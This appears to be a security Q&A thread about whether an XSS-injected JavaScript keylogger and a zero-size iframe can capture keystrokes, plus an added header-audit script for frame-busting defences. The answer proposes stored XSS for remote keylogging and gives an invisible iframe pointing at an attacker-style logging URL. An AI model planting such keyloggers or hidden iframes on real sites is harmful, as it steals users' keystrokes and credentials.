9

Is it possible for a website to have a JavaScript keylogger and also contain an iframe that goes to a "client" site?

  • Can the JS log all keystrokes done on the client site?
  • Can the (host) iframe be invisible or 0 x 0 in size?
  • Can the "client" site detect and bust the iframe?

1 Answer 1

7

You can embed a .js file using a stored XSS to perform the remote keylogging. Using Ajax, it should be easy to do the remote logging. Have a look at the JavaScript keylogger here: http://code.google.com/p/javascript-keylogger

Setting the iframe width and height to zero answers the second question:

<iframe src="attacker.com/log.php" width="0" height="0"></iframe>

What you are asking in the third question is frame busting. There are techniques to do that: https://www.owasp.org/index.php/Clickjacking#Defending_with_Frame_Breaking_Scripts

3
  • But frame busting is not reliable if you have an XSS vulnerability, as you can, in IE8 and Chrome, use the XSS filter to destroy it. Commented Oct 31, 2012 at 8:51
  • For almost every mitigation whether on the OS level or the webapp level there is always a way to bypass when coupled with other vulnerabilities. Commented Nov 1, 2012 at 9:14
  • My point was, don't think that because you're using this technique, you're home free, and don't have to care about XSS vulnerabilities. Commented Nov 1, 2012 at 9:46
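
For the third question, a "client" site can also refuse framing through the X-Frame-Options and CSP frame-ancestors response headers, which the browser enforces before any page script runs. The following is an added example, not code from the answer or comments above, and it goes beyond the script-based frame busting they discuss: it audits a response's headers and reports whether a given origin could embed the page. The function names, the origins client.example, host.example and partner.example, and the sample headers are constructed for illustration.

```javascript
// Added example: would these response headers let `embedder` frame a page
// served from `pageOrigin`? Assumptions: one CSP header, a single level of
// framing, exact-origin matching only (no host wildcards or scheme sources).
function frameAncestors(csp) {
  // Source list of the frame-ancestors directive, or null when absent.
  for (const directive of (csp || "").split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === "frame-ancestors") return sources;
  }
  return null;
}

function canBeFramedBy(headers, pageOrigin, embedder) {
  const h = {}; // header names are case-insensitive
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // When frame-ancestors is present it is enforced and X-Frame-Options is ignored.
  const sources = frameAncestors(h["content-security-policy"]);
  if (sources !== null) {
    return sources.some((s) => {
      const src = s.toLowerCase();
      if (src === "'none'") return false;
      if (src === "'self'") return embedder === pageOrigin;
      return src === "*" || src === embedder.toLowerCase();
    });
  }
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return embedder === pageOrigin;
  return true; // no recognised framing policy: any site may embed the page
}

// Constructed sample responses for a "client" page.
const PAGE = "https://client.example";
const samples = {
  unprotected: { "Content-Type": "text/html" },
  legacy: { "X-Frame-Options": "SAMEORIGIN" },
  csp: { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" },
  partner: { "X-Frame-Options": "DENY",
             "Content-Security-Policy": "frame-ancestors 'self' https://partner.example" },
};

// Map each sample name to whether `embedder` could frame it.
function audit(embedder) {
  return Object.fromEntries(Object.entries(samples).map(
    ([name, hdrs]) => [name, canBeFramedBy(hdrs, PAGE, embedder)]));
}
console.log(audit("https://host.example"));
```

A result of `true` for a page that accepts keyboard input or clicks means the page relies on script-based frame busting alone, or on nothing.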
